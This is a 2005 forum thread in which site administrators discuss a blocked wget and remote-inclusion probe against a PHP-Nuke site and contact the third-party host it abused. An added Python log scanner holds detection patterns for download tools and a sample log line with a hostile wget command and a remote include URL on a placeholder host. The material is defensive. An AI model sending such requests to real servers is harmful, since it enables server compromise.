ring_c
Involved
Joined: Dec 28, 2003
Posts: 276
Location: Israel
Posted: Mon Dec 19, 2005 12:02 am

hitwalker
Sells PC To Pay For Divorce
Joined:
Posts: 5661
Posted: Mon Dec 19, 2005 8:00 am

Well, from what I could find about it, it is an attack, but because of the variety of types I couldn't point out the exact one..... I'm not sure. But it uses another site like vesdo..
It addresses the mailserver, phpBB, or even Coppermine.
But a reply I found also said... "Looks like a variant of the santy worm to me, that also used LWP::Simple"
And that had the same contents as what you posted...

ring_c
Posted: Mon Dec 19, 2005 8:53 am

Gee, you got me now, hitwalker!
I was certain that's not an attack! Gee...
Well, if NukeSentinel recognizes it, do I have anything to fear?

hitwalker
Posted: Mon Dec 19, 2005 9:08 am

Well, don't take my word completely; I searched over and over with Google using full lines of your post...
One thing is certain, and that is it's described as an attack for gaining...... whatever access to whatever...
I'm not gonna post anything by making things up....
Also a thing to keep in mind is that a lot of sites were abused remotely because some things on their server were vulnerable.
But the abusive links to be used by other hackers are spread around but never "updated".
The site abused for whatever reason is vesdo.nl, and your attack lines are targeted at sites using phpBB, Coppermine etc.... and vesdo is a Mambo CMS site, and could easily be an old abused address still available in the search engines.
The combined URLs you see with vesdo don't exist.
As you said.. Sentinel stopped it, so no worries...

evaders99
Former Moderator in Good Standing
Joined: Apr 30, 2004
Posts: 3221
Posted: Mon Dec 19, 2005 11:54 pm

Yes, it is a cross-site scripting attack. wget is a command to get something from the other server.. in this case at the vesdo.nl address. You'd probably find some nasty code in there to further compromise your system.
What I don't understand is that this IP is coming from Yahoo's Inktomi search engine. So someone is probably trying to hide their current IP.
You may need to contact the vesdo.nl server admins too, to see if you can get things removed from their server.

ring_c
Posted: Tue Dec 20, 2005 1:58 am

Evaders99, thank you.
I've addressed vesdo.nl's site owner/manager and added a link to this thread. Maybe he'll want to explain something to us...

hitwalker
Posted: Tue Dec 20, 2005 5:51 am

Well, I already did leave a message on his answering machine and mailed him, no sign of life yet....
How grateful some people are...

ring_c
Posted: Tue Dec 20, 2005 8:59 am

hitwalker, is there anything we can do without him?
Should we address Yahoo! as well?

hitwalker
Posted: Tue Dec 20, 2005 9:13 am

No...
I already had a phone call with the owner of the Dutch site an hour ago...
He will be contacting his host to see if they can look into this as well.
They can check more than we can; it's interesting to see what it is exactly and why his domain is used.
But I know a little bit what the attackers' intention was.
They wanted to use the cache of Mambo.
If you look at the URL you see it's written like ..CACHE, well that doesn't exist.
But cache... does, that's simply from Mambo itself.... and something that can be turned on or off.
But mailing Yahoo is really useless.. that company is born deaf and blind..

ring_c
Posted: Tue Dec 20, 2005 9:29 am

hitwalker wrote:
    But I know a little bit what the attackers' intention was.
    They wanted to use the cache of Mambo.
    If you look at the URL you see it's written like ..CACHE, well that doesn't exist.

What were they trying to do to my site? Can you tell?

hitwalker
Posted: Tue Dec 20, 2005 9:40 am

Well, the only thing we know is that the commands they used are to get access..
But what exactly is hard to say, but it comes to this.... script kiddies build something that uses wget on the server side to download an IRC bot or rootkit.
wget will be called by passing its name among a URL and probably some compiler, tar, mkdir, .. commands to an exploitable script on your server.
Then you find wget in the query strings in your log files.
A little bit of info I gathered..
But I'll reply here again as I get a response again from that guy's website.

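As an added illustration of the log hunting hitwalker describes (not code from this thread or from NukeSentinel), here is a small Python script that flags access-log requests whose query string carries wget or another download tool, a remote URL as a parameter value, or the libwww-perl user agent that LWP::Simple sends; the log lines, IP addresses and host names are constructed for the example.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Apache "combined" log line, e.g.
# 192.0.2.10 - - [19/Dec/2005:00:02:11 +0200] "GET /index.php?x=1 HTTP/1.1" 200 512 "-" "Mozilla/4.0"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
# Download tools and shell helpers that have no business inside a query string.
TOOL_RE = re.compile(
    r'\b(wget|curl|lynx|fetch|lwp-download|LWP::Simple|tar|mkdir|chmod|gcc)\b', re.I)
# A parameter value that is itself a URL: the remote-inclusion pattern the thread describes.
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.I)

def analyse(line):
    """Return the reasons a request looks like a wget / remote-inclusion probe ([] if clean)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    query = urlsplit(m.group('target')).query
    # Decode twice: probes are often double-encoded to slip past naive filters.
    decoded = unquote_plus(unquote_plus(query))
    reasons = []
    hit = TOOL_RE.search(decoded)
    if hit:
        reasons.append('download/shell tool in query string: %s' % hit.group(0))
    for name, value in parse_qsl(query, keep_blank_values=True):
        if REMOTE_RE.match(unquote_plus(value)):
            reasons.append('remote URL passed in parameter %r' % name)
    if any(c in decoded for c in ';|`'):
        reasons.append('shell metacharacter in query string')
    if 'libwww-perl' in m.group('ua').lower():
        reasons.append('libwww-perl (LWP) user agent')  # weak signal on its own
    return reasons

# Constructed sample log lines (documentation IPs, placeholder host), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [19/Dec/2005:00:02:11 +0200] "GET /modules.php?name=Forums&file=viewtopic&t=42 HTTP/1.1" 200 8412 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [19/Dec/2005:00:02:13 +0200] "GET /index.php?page=%68ttp://third-party.example/cache/cmd.txt?&cmd=wget%20http://third-party.example/bot.tgz HTTP/1.1" 403 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp)"',
    '198.51.100.7 - - [19/Dec/2005:00:02:14 +0200] "GET /album/index.php?include=http://third-party.example/x.txt HTTP/1.1" 200 120 "-" "libwww-perl/5.803"',
]

if __name__ == '__main__':
    for line in SAMPLE_LOG:
        reasons = analyse(line)
        if reasons:
            print(line.split()[0], '->', '; '.join(reasons))
```

A search-engine user agent on a flagged line, as in the second sample, is itself worth a closer look, since the thread's probe arrived from a Yahoo crawler address.
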
ring_c
Posted: Wed Dec 21, 2005 12:13 am

Thanks for everything, hitwalker...

hitwalker
Posted: Wed Dec 21, 2005 2:49 pm

Well, he got a reply and mailed it, but unfortunately with not that much info.
They detected a few things as well but didn't tell exactly what..., they did tell him not to use the cache anymore... so that's it..

ring_c
Posted: Wed Dec 21, 2005 2:58 pm

Hmmm... disappointing..